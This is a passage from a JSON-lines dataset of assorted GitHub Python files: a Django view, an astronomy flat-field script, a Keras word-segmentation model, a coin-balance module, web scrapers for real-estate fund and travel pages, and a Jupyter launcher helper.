Response(status=500)\n        except Exception as e:\n            log.error(f\"Something went wrong {e}\")\n            return Response(status=404)\n\n    @swagger_auto_schema(\n        operation_description=\"Delete author\",\n        responses={204: \"successful\", \"other\": \"something went wrong\"},\n        manual_parameters=[token_param],\n    )\n    def destroy(self, request, *args, **kwargs):\n        try:\n            return super().destroy(request, *args, **kwargs)\n        except Author.DoesNotExist:\n            log.error(\"User is not an author\")\n            return Response(\"User is not an author\", status=500)\n        except Exception as e:\n            log.error(f\"Something went wrong {e}\")\n            return Response(status=404)\n","repo_name":"paffel2/news_server_py","sub_path":"news/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7299400157","text":"import astropy.io.fits as pyfits\nimport numpy as np\nfrom glob import glob\n\n\nfor filename in glob(\"2022*-long.fit*\"):\n    last = filename\nwith open(last, 'rb') as f:\n    lastf = pyfits.open(f)[0]\n\nshort = []\nfor filename in glob(\"2022*-short.fit*\"):\n    short.append(pyfits.getdata(filename))\n\nlong = []\nfor filename in glob(\"2022*-long.fit*\"):\n    long.append(pyfits.getdata(filename))\n\nmaster_short = np.mean(short, axis=0)\nmaster_long = np.mean(long, axis=0)\n\nmaster_data = (master_long - master_short).clip(min=0)\nh = pyfits.PrimaryHDU(master_data, header=lastf.header, scale_back=False)\nh.scale('uint16')\nh.header['BZERO'] = 32768\nh.header['BSCALE'] = 1\nh.writeto('master_flat.fit', overwrite=True)\n","repo_name":"pcchou/latte-data-processing","sub_path":"flat_raw_longshort/create_latte_long_short_flat.py","file_name":"create_latte_long_short_flat.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74127631262","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@file: bilstm_cnn_crf.py\n\"\"\"\nimport codecs\nimport pickle\nimport gensim\nimport numpy as np\nfrom keras.layers import *\nfrom keras_contrib.layers import CRF\nfrom keras.models import *\nfrom keras.utils import plot_model\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nfrom keras.callbacks import ModelCheckpoint\n\nfrom keras.models import model_from_json\n\nnp.random.seed(1111)\n\n\nclass 
Documents(object):\n    def __init__(self, chars, label, index):\n        self.chars = chars\n        self.label = label\n        self.index = index\n\n\n# train the model and save the weights\ndef process_train(corpus_path, nb_epoch, base_model_weight=None):\n    # ********************** training data preprocessing **********************\n\n    # 1. read the corpus: paths of all corpus files under the corpus folder\n    raw_train_file = [corpus_path + os.sep + folder + os.sep + file\n                      for folder in os.listdir(corpus_path)\n                      for file in os.listdir(corpus_path + os.sep + folder)]\n\n    # 2. read each corpus file to generate train.data, then build the raw training data from train.data\n    process_data(raw_train_file, 'train.data')\n    train_docs = create_docs('train.data')\n    print(\"***** number of training samples after splitting on punctuation: \", len(train_docs))\n\n    # 3. build the lexicon from the corpus data\n    lexicon, lexicon_reverse = get_lexicon(train_docs)\n    print(\"***** lexicon size: \", len(lexicon))\n\n    # 4. load the pretrained word vectors\n    embedding_model = gensim.models.Word2Vec.load(r'model_conll_law.m')\n    embedding_size = embedding_model.vector_size\n    print(\"***** embedding dimension per character: \", embedding_size)\n    embedding_weights = load_embedding(embedding_model, embedding_size, lexicon_reverse)\n    print(\"***** shape of the pretrained embedding matrix: \", embedding_weights.shape)\n\n    # 5. convert the raw training data to lexicon indices and pad all samples to max_len\n    label_2_index = {'Pad': 0, 'B': 1, 'M': 2, 'E': 3, 'S': 4, 'Unk': 5}\n    index_2_label = {0: 'Pad', 1: 'B', 2: 'M', 3: 'E', 4: 'S', 5: 'Unk'}\n    train_data_list, train_label_list, train_index_list = create_matrix(train_docs, lexicon, label_2_index)\n    max_len = max(map(len, train_data_list))\n    print(\"***** maximum raw sample length: \", max_len)\n    train_data_array, train_label_list_padding = padding_sentences(train_data_list, train_label_list, max_len)\n    print(\"***** shape of the padded data: \", train_data_array.shape)\n    # one-hot encode the labels\n    train_label_array = np_utils.to_categorical(train_label_list_padding, len(label_2_index)). \\\n        reshape((len(train_label_list_padding), len(train_label_list_padding[0]), -1))\n    print(\"***** shape of the one-hot labels: \", train_label_array.shape)\n\n    # ********************** model building and training **********************\n\n    # 1. build the BiLSTM-CNN-CRF model\n    model = bilstm_cnn_crf(max_len, len(lexicon), len(label_2_index), embedding_weights)\n    print(model.input_shape)\n    print(model.output_shape)\n\n    plot_model(model, to_file='bilstm_cnn_crf_model.png', show_shapes=True, show_layer_names=True)\n\n    if base_model_weight is not None and os.path.exists(base_model_weight):\n        model.load_weights(base_model_weight)\n\n    hist = model.fit(train_data_array, train_label_array, batch_size=256, epochs=nb_epoch, verbose=1)\n\n    # model.load_weights('best_val_model.hdf5')\n\n    '''\n    test_y_pred=model.predict(train_data_array,batch_size=512,verbose=1)\n    pred_label=np.argmax(test_y_pred,axis=2)\n    print(pred_label[0])\n\n    '''\n    score = model.evaluate(train_data_array, train_label_array, batch_size=512)\n    print(score)\n\n    # save model\n    model.save_weights('train_model.hdf5')\n\n    # save lexicon\n    pickle.dump([lexicon, lexicon_reverse, max_len, index_2_label], open('lexicon.pkl', 'wb'))\n\n\n# read each corpus file and generate train.data; each Chinese character is tagged {Single,Begin,Middle,End}\ndef process_data(file_list, new_file):\n    res = codecs.open(new_file, 'w', 'utf-8')\n    for file in file_list:\n        with codecs.open(file, 'r', 'utf-8') as fs:\n            lines = fs.readlines()\n            for line in lines:\n                word_list = line.strip().split()\n                for word in word_list:\n                    if len(word) == 1:\n                        res.write(word + '\\tS\\n')\n                    else:\n                        res.write(word[0] + '\\tB\\n')\n                        for w in word[1:-1]:\n                            res.write(w + '\\tM\\n')\n                        res.write(word[-1] + '\\tE\\n')\n            res.write('\\n')\n    res.close()\n\n\n# split the sentences of the training corpus on punctuation, so no line gets too long to optimize as one sequence\ndef create_docs(file_name):\n    docs = []\n    chars, label = [], []\n\n    
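# a blank line or a sentence-ending punctuation mark closes the current chunk as one Documents sample\n    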
with codecs.open(file_name, 'r', 'utf-8') as f:\n        index = 0\n        for line in f:\n            line = line.strip()\n            if len(line) == 0:\n                if len(chars) != 0:\n                    docs.append(Documents(chars, label, index))\n                    chars = []\n                    label = []\n                index += 1\n            else:\n                pieces = line.strip().split()\n                chars.append(pieces[0])\n                label.append(pieces[1])\n\n                if pieces[0] in ['。', ',', ';']:\n                    docs.append(Documents(chars, label, index))\n                    chars = []\n                    label = []\n\n        if len(chars) != 0:\n            docs.append(Documents(chars, label, index))\n\n    return docs\n\n\n# build the lexicon; indices are assigned by character (punctuation/digit/letter) frequency: the more frequent, the smaller the index\ndef get_lexicon(all_docs):\n    chars = {}\n    for doc in all_docs:\n        for char in doc.chars:\n            chars[char] = chars.get(char, 0) + 1\n\n    # sort characters (punctuation/digits/letters) by frequency in descending order\n    sorted_chars = sorted(chars.items(), key=lambda x: x[1], reverse=True)\n\n    # lexicon indices start from 1; index 0 is reserved for padding\n    lexicon = dict([(item[0], index+1) for index, item in enumerate(sorted_chars)])\n    lexicon_reverse = dict([(index+1, item[0]) for index, item in enumerate(sorted_chars)])\n\n    return lexicon, lexicon_reverse\n\n\n# load the pretrained word vectors, with one extra weight row added at the front and at the back\ndef load_embedding(model, size, lexicon_reverse):\n    weights = np.zeros((len(lexicon_reverse)+2, size))\n    for i in range(len(lexicon_reverse)):\n        weights[i+1] = model[lexicon_reverse[i+1]]\n    weights[-1] = np.random.uniform(-1, 1, size)\n\n    return weights\n\n\n# convert the raw training data to the lexicon index representation\ndef create_matrix(docs, lexicon, lab2idx):\n    datas_list = []\n    label_list = []\n    index_list = []\n    for doc in docs:\n        datas_tmp = []\n        label_tmp = []\n        for char, label in zip(doc.chars, doc.label):\n            datas_tmp.append(lexicon[char])\n            label_tmp.append(lab2idx[label])\n        datas_list.append(datas_tmp)\n        label_list.append(label_tmp)\n        index_list.append(doc.index)\n\n    return datas_list, label_list, index_list\n\n\n# pad the training data (zeros at the front) to the maximum sample length, for both data and labels\ndef padding_sentences(data_list, label_list, max_len):\n    padding_data_list = sequence.pad_sequences(data_list, maxlen=max_len)\n    padding_label_list = []\n    for item in label_list:\n        padding_label_list.append([0]*(max_len-len(item))+item)\n\n    padding_label_list = np.array(padding_label_list)\n\n    return padding_data_list, padding_label_list\n\n\n# build the BiLSTM-CNN-CRF model\n# max_len: maximum sentence-chunk length; char_dict_len: lexicon size; label_len: number of segmentation labels\n# embedding_weights: word vectors; is_train: training flag\ndef bilstm_cnn_crf(max_len, char_dict_len, label_len, embedding_weights=None, is_train=True):\n    word_input = Input(shape=(max_len,), dtype='int32', name='word_input')\n    if is_train:\n        word_emb = Embedding(char_dict_len+2, output_dim=100, input_length=max_len,\n                             weights=[embedding_weights], name='word_emb')(word_input)\n    else:\n        word_emb = Embedding(char_dict_len+2, output_dim=100, input_length=max_len,\n                             name='word_emb')(word_input)\n\n    # BiLSTM\n    bilstm = Bidirectional(LSTM(64, return_sequences=True))(word_emb)\n    bilstm_d = Dropout(0.1)(bilstm)\n\n    # CNN\n    half_window_size = 2\n    padding_layer = ZeroPadding1D(padding=half_window_size)(word_emb)\n    cnn_conv = Conv1D(nb_filter=50, filter_length=2*half_window_size+1, padding='valid')(padding_layer)\n    cnn_conv_d = Dropout(0.1)(cnn_conv)\n    dense_conv = TimeDistributed(Dense(50))(cnn_conv_d)\n\n    # BiLSTM+CNN\n    rnn_cnn_merge = merge([bilstm_d, dense_conv], mode='concat', concat_axis=2)\n    dense = TimeDistributed(Dense(label_len))(rnn_cnn_merge)\n\n    # CRF\n    crf = CRF(label_len, sparse_target=False)\n    crf_output = crf(dense)\n\n    # build model\n    print(\"***** Building model...... 
\")\n    model = Model(input=[word_input], output=[crf_output])\n    model.compile(loss=crf.loss_function, optimizer='adam', metrics=[crf.accuracy])\n\n    # model.summary()\n\n    return model\n\n\ndef main():\n    ## note\n    # put your corpus under the corpus folder; the corpus in my repo is compressed, unzip it before use\n    # 1. python embedding_model.py -> model_conll_law.m  generates the word vector file\n    # 2. python bilstm_cnn_crf.py  // is_train==1\n    #    yields train_model.hdf5 and lexicon.pkl\n    # 3. training can continue from a previous train_model.hdf5\n    # 4. after training, test with is_train==0\n    #    python bilstm_cnn_crf.py  tests by sentence or by file\n    # my_weights holds my trained weights\n\n    is_train = 1  # 1/0\n\n    if is_train == 1:\n        # train ☆☆☆☆☆☆☆\n        # training corpus path\n        corpus_path = 'corpus'\n        # initial model weights; training can continue from them\n        base_model_weight = 'train_model.hdf5'\n        nb_epoch = 1  # number of epochs\n        process_train(corpus_path, nb_epoch, base_model_weight)\n\n    ##############################################\n\n    lexicon, lexicon_reverse, max_len, index_2_label = pickle.load(open('lexicon.pkl', 'rb'))\n    # model\n    model = bilstm_cnn_crf(max_len, len(lexicon), len(index_2_label), is_train=False)\n    model.load_weights('train_model.hdf5')\n\n    # long-sentence test: split on punctuation, then test\n    text = ''\n    for i in range(10):\n        text += '南京市长莅临指导,大家热烈欢迎。公交车中将禁止吃东西!'\n    splitText, predLabel = word_seg_by_sentences(text, model, lexicon, max_len)\n    print(splitText)\n\n    fenci_by_file('test_documents/test_1', 'test_documents/test_1_mine', model, lexicon, max_len)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Daniel1586/Initiative_deep_learning","sub_path":"04_recurrent_neural_network/cws_bilstm_cnn_crf/bilstm_cnn_crf_.py","file_name":"bilstm_cnn_crf_.py","file_ext":"py","file_size_in_byte":10697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28303224184","text":"\"\"\"\nMultiprocessing\n\"\"\"\n\"\"\"\n    Multithreading\n\"\"\"\nfrom test import *\nimport multiprocessing as mp\nimport time\n\njobs = []\ntm = time.time()\nfor i in range(10):\n    t = mp.Process(target=count, args=(1,1))\n    jobs.append(t)\n    t.start()\n\n[i.join() for i in jobs]\n\nprint(\"Process cpu\", time.time()-tm)\n# Process cpu 2.108125925064087 compute\n# Process cpu 1.322871208190918  io\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nandadao/Python_note","sub_path":"note/my_note/second_month/day08/multi_process.py","file_name":"multi_process.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41249642826","text":"\"\"\"Implements an i/o system for accessing and changing GasterCoin account values.\"\"\"\r\nimport ujson\r\n\r\nACCOUNTS_FILE = f'./subs/gastercoin/resources/accounts.json'\r\n\r\nBALANCE_KEY = 'balance'\r\nFREE_MONEY_KEY = 'free_money'\r\nSPECIAL_MOVE_KEY = 'special_move'\r\nDEFAULT_ACCOUNT = {BALANCE_KEY: 0,\r\n                   FREE_MONEY_KEY: 0,\r\n                   SPECIAL_MOVE_KEY: 'being lame and not having a special move set by typing '\r\n                                     '`~dm special edit [message]`'}\r\n\r\nSUCCESS_STRING = 'SUCCESS'\r\n\r\n\r\ndef parse_int(number_as_string, return_bool=False):\r\n    \"\"\"Converts a string into an int if the string represents a valid integer\"\"\"\r\n    try:\r\n        if len(number_as_string) > 1:\r\n            int(str(number_as_string)[:-1])\r\n        else:\r\n            if len(number_as_string) == 0:\r\n                if return_bool:\r\n                    return False\r\n                else:\r\n                    raise ValueError\r\n            if len(number_as_string) == 1 and number_as_string.isdigit():\r\n                if return_bool:\r\n                    return True\r\n                else:\r\n                    return int(number_as_string)\r\n            else:\r\n                if return_bool:\r\n                    return False\r\n                else:\r\n                    raise ValueError\r\n    except ValueError:\r\n        if return_bool is False:\r\n            raise 
ValueError\r\n else:\r\n return False\r\n last_char = str(number_as_string)[-1]\r\n if not return_bool:\r\n if last_char.isdigit():\r\n return int(number_as_string)\r\n elif last_char == 'k':\r\n return int(number_as_string[:-1]) * 1000\r\n elif last_char == 'm':\r\n return int(number_as_string[:-1]) * 1000000\r\n elif last_char == 'b':\r\n return int(number_as_string[:-1]) * 1000000000\r\n else:\r\n raise ValueError\r\n if return_bool:\r\n if last_char.isdigit() or last_char in ['k', 'm', 'b']:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef update_account(userid, amount, key=BALANCE_KEY):\r\n \"\"\"Changes the value of a key within a user's account.\"\"\"\r\n userid = str(userid)\r\n with open(ACCOUNTS_FILE, 'r') as f:\r\n accounts = ujson.load(f)\r\n\r\n if userid not in accounts:\r\n accounts[userid] = DEFAULT_ACCOUNT\r\n\r\n if key == BALANCE_KEY:\r\n accounts[str(userid)][BALANCE_KEY] += amount\r\n if key == FREE_MONEY_KEY:\r\n accounts[str(userid)][FREE_MONEY_KEY] = amount\r\n if key == SPECIAL_MOVE_KEY:\r\n accounts[str(userid)][SPECIAL_MOVE_KEY] = amount\r\n\r\n with open(ACCOUNTS_FILE, 'w') as f:\r\n ujson.dump(accounts, f)\r\n\r\n\r\ndef read_account(userid, key=BALANCE_KEY):\r\n \"\"\"Reads the value of a key within a user's account.\"\"\"\r\n userid = str(userid)\r\n try:\r\n with open(ACCOUNTS_FILE, 'r') as f:\r\n accounts = ujson.load(f)\r\n if userid not in accounts:\r\n accounts[userid] = DEFAULT_ACCOUNT\r\n return accounts[userid][key]\r\n except KeyError:\r\n return 0\r\n\r\n\r\ndef check_if_valid_transaction(userid, amount, username=None, zero_valid=False):\r\n \"\"\"Determines whether a user can make a transaction or not based on the inputted amount.\"\"\"\r\n try:\r\n amount = parse_int(str(amount))\r\n if amount <= 0 and not zero_valid or amount < 0 and zero_valid:\r\n return f'Error: G${amount} is not a valid transaction amount.'\r\n author_balance = read_account(userid)\r\n if author_balance < amount:\r\n if username is None:\r\n return f'Error: Insufficient funds. Your current balance is G${author_balance}.'\r\n else:\r\n return f\"Error: Insufficient funds. 
{username}'s current balance is G${author_balance}.\"\r\n return SUCCESS_STRING\r\n except ValueError:\r\n return f'Error: G${amount} is not a valid number.'\r\n","repo_name":"coizioc/math-bot-gastercoin","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15677685071","text":"#!/usr/bin/python3\n\n\"\"\"\nPerforms an update on table \"real_estates\" and \"real_estates_indices\"\n\nAuthor: Rozario Engenharia\n\nFirst release: December 1st, 2021\n\"\"\"\n\nfrom bs4 import BeautifulSoup # for parsing html pages (web scraping)\nfrom urllib.request import Request, urlopen\nfrom unidecode import unidecode\nimport configparser # for reading settings file\nimport sys # for command line arguments and for pointing rozlib library folder (path comes from config.ini file)\nimport re # for regular expressions purposes\nimport psycopg2 # for SQL interface\nfrom datetime import datetime # for getting timestamp and date\nimport traceback # for printting exception traceback\nimport math\n\n# Reads rozlib library, and fiislib library paths from config.ini file and import libraries packages\nrozlib_path = ''\ndef add_rozlib_library_path():\n global rozlib_path, fiislib_path\n config = configparser.ConfigParser()\n config.sections()\n config.read(r'config.ini', encoding='utf-8')\n rozlib_path = config['GENERAL']['rozlibFolderPath']\n sys.path.insert(1, rozlib_path)\n \n fiislib_path = config['GENERAL']['fiislibFolderPath']\n sys.path.insert(1, fiislib_path)\nadd_rozlib_library_path()\n\nfrom rozlib.database.postgres import Postgres\nfrom rozlib.util import Utilities\nimport fiislib\n\nreal_estates_column_names = [\n 'fii_id',\n 'description',\n 'state_province',\n 'goal',\n 'area',\n ]\n\nreal_estates_indices_column_names = [\n 'estate_id',\n 'timestamp',\n 'vacancy',\n 'non_payment'\n]\n\nverbosity = 1\n\n# Utilities object\nutilities = Utilities(verbosity)\n\n# Library with common methods for all information related to FIIs\nfiis_definition = fiislib.FIIs()\n\ndef getFiiRealEstatesDetailedInfo(fii_ticker):\n \"\"\"Gets detailed information about real estates from a FII\n\n Args:\n fii_ticker (str): FII ticker for which real estates' detailed information should be gathered\n\n Returns:\n list: list of dictionaries with detailed information about all real estates bound to the given FII:\n description\n state/province\n goal\n (surface) area\n vacancy\n non-payment\n \"\"\"\n \n realEstateDetailedInfo = []\n\n # With Beautiful Soup retrieves 0, 1 or many estates related to the given FII\n soup = BeautifulSoup(urlopen(Request(fiis_definition.FIIDetailedDataURLPart2.replace('FII_TICKER', fii_ticker), headers={\"User-Agent\": \"Mozilla/5.0\"})).read(), features='html.parser')\n try:\n portfolio_section = soup.find(\"div\", attrs={'id':'portfolio-section'}) # Main div\n non_land_real_estates_section = portfolio_section.find('div', attrs={'class':'card-list-box navigation-dot-white', 'data-title': 'IMÓVEL'}) # non landscapes div\n land_real_estates_section = portfolio_section.find('div', attrs={'class':'card-list-box navigation-dot-white', 'data-title': 'TERRENO'}) # landscapes div\n except AttributeError:\n utilities.eprint(2, f'{fii_ticker} has no page with detailed real estates information')\n return\n\n if non_land_real_estates_section == None:\n return []\n\n # Gets all estates' descriptions\n descriptions = []\n for currentEstateDescription in 
non_land_real_estates_section.findAll('div', attrs={'class':'name'}):\n descriptions.append(unidecode(u'{0}'.format(currentEstateDescription.find('span').text))) # Gets rid of special unicode characters\n\n # Gets all estates' states/provinces\n states_provinces = []\n for current_state_province in non_land_real_estates_section.findAll('strong', attrs={'class':'uf mr-1'}):\n states_provinces.append(current_state_province.text)\n \n # Gets all estates' goals\n goals = []\n for current_goal in non_land_real_estates_section.findAll('div', attrs={'class':re.compile(r'objective objective-[01]')}):\n goals.append(current_goal.find('strong', attrs={'class':'value'}).text)\n\n # Gets all estates' surface areas\n areas = []\n for current_area in non_land_real_estates_section.findAll('strong', attrs={'class':'value mt-0 w-55 justify-end d-flex'}):\n areas.append(float(current_area.find('span').text.replace('.', '').replace(',', '.').replace('m²', '')))\n\n # Gets all estates' vacancies and non-payment statuses\n vacancies = []\n non_payments = []\n i = 0\n for all_vacancy_non_payment_pairs in non_land_real_estates_section.findAll('div', attrs={'class':'d-flex justify-between align-items-center'}):\n for current_vacancy_non_payment_pair in all_vacancy_non_payment_pairs.findAll('strong', attrs={'class':'value'}):\n if i % 2 == 0:\n vacancies.append(float(current_vacancy_non_payment_pair.text.replace(',', '.').replace('%', '').replace('-', '-1')))\n else:\n non_payments.append(float(current_vacancy_non_payment_pair.text.replace(',', '.').replace('%', '').replace('-', '-1')))\n i = i + 1\n\n # Prepares the list of dictionaries with all estates' information\n try:\n for i in range(0, len(descriptions)):\n current_estate_dict = {}\n current_estate_dict['description'] = descriptions[i]\n current_estate_dict['state_province'] = states_provinces[i]\n current_estate_dict['goal'] = goals[i]\n current_estate_dict['area'] = areas[i]\n current_estate_dict['vacancy'] = vacancies[i]\n current_estate_dict['non_payment'] = non_payments[i]\n realEstateDetailedInfo.append(current_estate_dict)\n except IndexError as e:\n utilities.eprint(2, f'Problems recovering {fii_ticker} estates\\n{traceback.format_exc()}')\n\n return realEstateDetailedInfo\n\ndef registerNewEstateIfNecessary(fii_id, ticker, estateInfoDictionary, pgsql):\n \"\"\"Inserts a new Estate in the \"estates\" table, if it is not registered there yet\n fii_id FII identification in the reigistered_fiis table\n\n Args:\n fii_id (int): FII identification in the reigistered_fiis table\n ticker (str): FII ticker for which real estates' detailed information should be gathered\n estateInfoDictionary (dict): real estate information, containing the owner FII ID, its description, state/province, its goal and total area\n pgsql (postgres.Postgres): object with a valid connection to the SQL database\n\n Returns:\n int: just inserted estate id, or existing estate id, from the estates table\n \"\"\"\n \n # first checks if given estate already exists\n pgsql.cur.execute(\"SELECT estate_id\\n\"\n \"FROM real_estates\\n\"\n \"WHERE description = %s AND area = %s AND fii_id = %s;\",\n (estateInfoDictionary['description'],\n estateInfoDictionary['area'],\n fii_id, ))\n retrievedTuple = pgsql.cur.fetchone()\n \n # if the estate is not yet registered, inserts it in the estates table\n if retrievedTuple == None:\n estate_id = pgsql.exec_insert_query('real_estates',\n real_estates_column_names, \n (fii_id, estateInfoDictionary['description'],\n 
estateInfoDictionary['state_province'],\n estateInfoDictionary['goal'],\n estateInfoDictionary['area'], ),\n 'estate_id')\n pgsql.conn.commit()\n utilities.print_verbose(f'New real estate inserted for FII {ticker}', verbosity_level=1)\n return estate_id\n else:\n return retrievedTuple[0]\n\ndef updateFiiRealEstatesIndices(fii_id, ticker, estates_info_dict, pgsql):\n \"\"\"Updates indices of a single real estate, related to a given FII, in the real_estates_indices table\n\n Args:\n fii_id (int): FII identification in the reigistered_fiis table\n ticker (str): FII ticker for which real estates' detailed information should be updated\n estates_info_dict (dict): real estate information, containing the owner FII ID, its description, state/province, its goal and total area\n pgsql (postgres.Postgres): object with a valid connection to the SQL database\n \"\"\"\n \n # To make sure the correct real estate is picked from DB, rather than comparing description\n # and the FII to whose it belongs, also compares the area\n pgsql.cur.execute(\"SELECT rei.vacancy, rei.non_payment\\n\"\n \"FROM real_estates_indices AS rei, real_estates AS re\\n\"\n \"WHERE rei.estate_id = re.estate_id AND LOWER(re.description) = LOWER(%s) AND re.area = %s AND re.fii_id = %s\\n\"\n \"ORDER BY rei.timestamp DESC\",\n (estates_info_dict['description'],\n estates_info_dict['area'],\n fii_id, ))\n retrievedTuples = pgsql.cur.fetchone()\n \n # To pick the real estate ID it is necessary to check it apart of the real estate's indices, in\n # case there is no index bound to it yet\n pgsql.cur.execute( 'SELECT estate_id '\n 'FROM real_estates '\n 'WHERE description = %s AND area = %s AND fii_id = %s',\n (estates_info_dict['description'],\n estates_info_dict['area'],\n fii_id ))\n estate_id = pgsql.cur.fetchone()[0]\n \n if (retrievedTuples == None or\n (retrievedTuples != None and\n (estates_info_dict['vacancy'] != retrievedTuples[0] or estates_info_dict['non_payment'] != retrievedTuples[1]))):\n \n values = (estate_id, datetime.now(), estates_info_dict['vacancy'], estates_info_dict['non_payment'])\n try:\n pgsql.exec_insert_query('real_estates_indices', real_estates_indices_column_names, values)\n pgsql.conn.commit()\n utilities.print_verbose(f'Vacancy/non-payment updated to {ticker}, real estate {estates_info_dict[\"description\"]}, ID {estate_id}', verbosity_level=1)\n except psycopg2.errors.UniqueViolation:\n utilities.eprint(2, f'Error when updating {ticker}, estate id {estate_id}, estate description {estates_info_dict[\"description\"]}. 
Duplicated entry.')\n pgsql.conn.rollback()\n\ndef updateRealEstatesIndicesForFiis(current_fii):\n \"\"\"Updates real estates indices of a given FII\n\n Args:\n current_fii (tuple): FII information, with pattern (fii_id, ticker, historical_data_link)\n \"\"\"\n \n # Connects to the datebase\n postgres = Postgres(fiis_definition.dbname, fiis_definition.hostname, fiis_definition.postgres_port, fiis_definition.user_name, fiis_definition.user_passwd)\n postgres.connectToDatabase()\n\n # Picks real estates detailed information for the given FII\n current_fii_real_estates_dict = getFiiRealEstatesDetailedInfo(current_fii[1])\n if current_fii_real_estates_dict != None:\n for current_estate in current_fii_real_estates_dict:\n registerNewEstateIfNecessary(current_fii[0], current_fii[1], current_estate, postgres)\n updateFiiRealEstatesIndices(current_fii[0], current_fii[1], current_estate, postgres)\n \n # Disconnects from the database\n postgres.disconnectFromDatabase()\n\ndef main():\n # first, retrieves configuration data from the .ini file\n fiis_definition.retrieveConfigurationFromINIFile()\n\n # second, picks the list of available FIIs, from \"registered FIIs\" table\n fiis_list = fiis_definition.get_registered_fiis_list()\n\n # third, retrieves quotes information from FII\n utilities.call_function_for_single_or_multithread(fiis_list, updateRealEstatesIndicesForFiis)\n\nif __name__ == '__main__':\n utilities.call_function_with_elapsed_time(main)\n","repo_name":"GregorioRozario/cecdados","sub_path":"Python/database_loader/real_states_update.py","file_name":"real_states_update.py","file_ext":"py","file_size_in_byte":11437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39948258393","text":"import datetime\nimport time\nimport pytz\nimport random\nfrom apps.spider.spider_module.spider import MySpider\nfrom apps.spider.models import Calendar\n\n\nclass MafengwoSpider(MySpider):\n\tdomain = 'http://www.mafengwo.cn'\n\tstart_url = [\n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2016', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2015', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2014', \n\t\t'http://www.mafengwo.cn/app/calendar.php?year=2013',\n\t]\n\n\tdef parse(self, response_and_url):\n\t\tresponse = response_and_url[0]\n\t\turls = set()\n\t\tfor href in response.xpath(\"//li[@class='_j_hover']/span[@class='mark']/a[1]/@href\"):\n\t\t\turls.add(self.url_join(href))\n\t\treturn urls\n\t\t# return self.Request(url, callback=self.parse_dir_item)\n\n\tdef parse_dir_item(self, response_and_url):\n\t\tresponse = response_and_url[0]\n\t\t\n\t\ttry:\n\t\t\titem = {}\n\t\t\titem['url'] = response_and_url[1]\n\t\t\titem['title'] = response.xpath(\"//div[@id='_j_cover_box']/div[@class='_j_titlebg']/div[@class='view_info']/div[@class='vi_con']/h1/text()\")[0].strip()\n\t\t\titem['img_src'] = response.xpath(\"//div[@id='_j_cover_box']/div[@class='set_bg _j_load_cover']/img/@src\")[0]\n\t\t\titem['ding_num'] = int(response.xpath(\"//div[@class='ding']/a/@data-vote\")[0])\n\t\t\titem['destinaion'] = response.xpath(\"//div[@class='mdd_info']/a/strong/text()\")[0].strip()\n\n\t\t\tcreated_at = response.xpath(\"//div[@class='person']/div[@class='vc_time']/span[@class='time']/text()\")[0].strip()\n\t\t\tcreated_at = datetime.datetime.strptime(created_at, '%Y-%m-%d %H:%M').replace(tzinfo=pytz.timezone('Asia/Shanghai'))\n\t\t\titem['created_at'] = created_at\n\n\t\texcept IndexError:\n\t\t\treturn\n\t\t\n\t\tobj, created = 
Calendar.objects.update_or_create(url=item['url'], defaults=item)\n\t\t\n\t\tprint('-------------------------------------')\n\t\tprint(item['title'])\n\n\tdef crawl(self):\n\t\tcounter = 0\n\t\t\n\t\tself.url_mgr.add_new_urls(self.start_url)\n\t\t\n\t\twhile self.url_mgr.has_new_url:\n\t\t\tcounter += 1\n\t\t\t\n\t\t\tif counter == 10:\n\t\t\t\ttime.sleep(random.randint(5, 15))\n\t\t\t\tcounter = 0\n\t\t\t\n\t\t\tnew_url = self.url_mgr.get_new_url()\n\t\t\t\n\t\t\tif new_url in self.start_url:\n\t\t\t\tnew_url_list = list(self.Request([new_url, ]))[0]\n\t\t\t\tself.url_mgr.add_new_urls(new_url_list)\n\t\t\telse:\n\t\t\t\tlist(self.Request([new_url, ], callback=self.parse_dir_item))","repo_name":"PU-101/sansanxin","sub_path":"apps/spider/mafengwo.py","file_name":"mafengwo.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5613827474","text":"def Factorial(a):\n result = 1\n num = a\n\n while num > 0:\n result *= num\n num -= 1\n\n return result\n\na = input('number?')\n\nwhile not a.isdigit():\n a = input('again')\n\na = int(a)\n\nresult = Factorial(a)\n\n\n\n\nprint(result)\n","repo_name":"Cyntha-K/bioinfo-lecture-2021-07","sub_path":"0706/012.py","file_name":"012.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"19329451529","text":"import asyncio\nimport os\nfrom time import sleep\n\nimport jupytext\n\n\nasync def run_jupyter_shell(port, token, pids):\n script = f\"\"\"\n export JUPYTER_TOKEN={token};\n PORT={port};\n jupyter notebook --no-browser --port=$PORT\n \"\"\"\n process = await asyncio.create_subprocess_shell(script)\n pids.append(process.pid + 1)\n\n\ndef start_jupyter_server(port=8009, token=\"token\"):\n pids = []\n asyncio.set_event_loop(asyncio.new_event_loop())\n asyncio.get_event_loop().run_until_complete(run_jupyter_shell(port, token, pids))\n asyncio.get_event_loop().close()\n return pids[0]\n\n\ndef modify_ipynb_file(path):\n notebook = jupytext.read(path)\n first_cell = notebook.cells[0]\n first_cell['source'] = 